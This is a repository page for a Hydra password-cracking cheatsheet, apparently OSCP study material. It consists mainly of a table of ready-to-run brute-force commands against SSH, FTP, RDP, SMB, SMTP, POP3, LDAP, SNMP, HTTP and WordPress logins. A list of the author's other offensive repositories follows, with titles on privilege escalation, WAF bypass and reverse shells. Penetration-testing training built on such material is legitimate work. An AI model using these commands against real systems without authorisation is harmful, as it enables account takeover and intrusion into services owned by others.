• Stars
    star
    365
  • Rank 116,851 (Top 3 %)
  • Language
  • License
    GNU General Publi...
  • Created about 6 years ago
  • Updated about 4 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Hydra Password Cracking Cheetsheet

Hydra-Cheatsheet

Hydra Password Cracking Cheetsheet

The following table uses the $ip variable which can be set with the following command:

export ip 10.10.10.1

Command Description
hydra -P password-file.txt -v $ip snmp Hydra brute force against SNMP
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp Hydra FTP known user and rockyou password list
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh Hydra SSH using a known password and a username list
hydra $ip -s 22 ssh -l -P big_wordlist.txt Hydra SSH Against Known username on port 22
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V Hydra POP3 Brute Force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V Hydra SMTP Brute Force
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin Hydra attack http get 401 login with a dictionary
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip Hydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb Hydra brute force SMB user with rockyou:
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Hydra brute force a Wordpress admin login
hydra -L usernames.txt -P passwords.txt $ip smb -V -f SMB Brute Forcing
hydra -L users.txt -P passwords.txt $ip ldap2 -V -f LDAP Brute Forcing

More Repositories

1

Windows-Privilege-Escalation

Windows Privilege Escalation Techniques and Scripts
Batchfile
762
star
2

Hashcat-Cheatsheet

Hashcat Cheatsheet for OSCP
588
star
3

Vanquish

Vanquish is Kali Linux based Enumeration Orchestrator. Vanquish leverages the opensource enumeration tools on Kali to perform multiple active information gathering phases.
Python
500
star
4

Bypassing-Web-Application-Firewalls

A series of python scripts for generating weird character combinations for bypassing web application firewalls (WAF) and XSS blockers
Python
272
star
5

MSF-Venom-Cheatsheet

Single Page Cheatsheet for common MSF Venom One Liners
235
star
6

Linux-Privilege-Escalation

Tips and Tricks for Linux Priv Escalation
217
star
7

PasswordDecrypts

Handy Stored Password Decryption Techniques
128
star
8

FirmwareReverseEngineering

Notes and tools from my experiences reverse engineering firmware
Python
104
star
9

HackingWithCurl

A list of examples and references of hacking with Bash and the Curl command
50
star
10

WordListGen

Super Simple Python Word List Generator for Fuzzing and Brute Forcing in Python
Python
48
star
11

WindowsShells

Information Repository on Various Methods of getting shell access into a Windows machine
16
star
12

BloodHoundCustomQueries

List of Bloodhound Python Custom Queries which I have found to be handy on engagements
Python
16
star
13

Powershell-Cheatsheet

Hand list of Powershell commands frequently used during penetration tests
14
star
14

Active-Directory-Fun

Notes on Active Directory analysis and exploitation
11
star
15

WindowsMeterpreterSessionDied

Some exploits are unstable in nature and only allow for a very short shell command window. These scripts can help extend your remote shell session by quickly spawning a new reverse shell.
Batchfile
8
star
16

SQLMapExamples

A list of sample SQL Map Injection Commands
Python
7
star
17

Wordlust

Wordlust is a Password Base Wordlist for Hashcat Mutator Rules
7
star
18

Python_DES_Decryptor

A simple python script for decrypting DES that has been generated by a .NET application
Python
6
star
19

Directory-Traversal-Toolbox

A few handy scripts for pulling important files off remote machines using a directory traversal or local file include vulnerability.
Python
6
star
20

DirtyStringInjectOneLiner

A one liner dirty string with many common injection techniques
4
star
21

CTF-Walkthroughs

A collection of CTF Walkthroughs
4
star
22

OpenSSL-Enc-By-Example

Examples of how to use openssl-enc for symmetric cipher encryption and decryption
3
star
23

MouseJacking

MouseJacking on Kali Linux with CrazyRadio PA
3
star
24

SSH_Sample_Keys

A collection of Public and Private SSH keys for reference purposes
3
star
25

SiteMapMaker

Creates an HTML site map based on a specified base URL and a folder path. Handy for exploring for hidden content in Burp Suite if you have the applicationโ€™s source code.
Python
2
star
26

MagicPing

Python 2.7 raw socket ICMP ping to send a embedded message or a magic ping to an endpoint
Python
2
star
27

KaliTroubleshooting

Handy Tricks for Troubleshooting Kali
2
star
28

XOR_MOAR

Simple Python Utilities Developed During CTF Events For XORing Data
Python
2
star
29

c2

C2
1
star
30

CLISerialFuzzer

Serial Connection CLI Command Jail Break Fuzzer
Python
1
star
31

VR-Industrial-Control-Room

Virtual Reality experience that transports people into an industrial control room environment.
ASP
1
star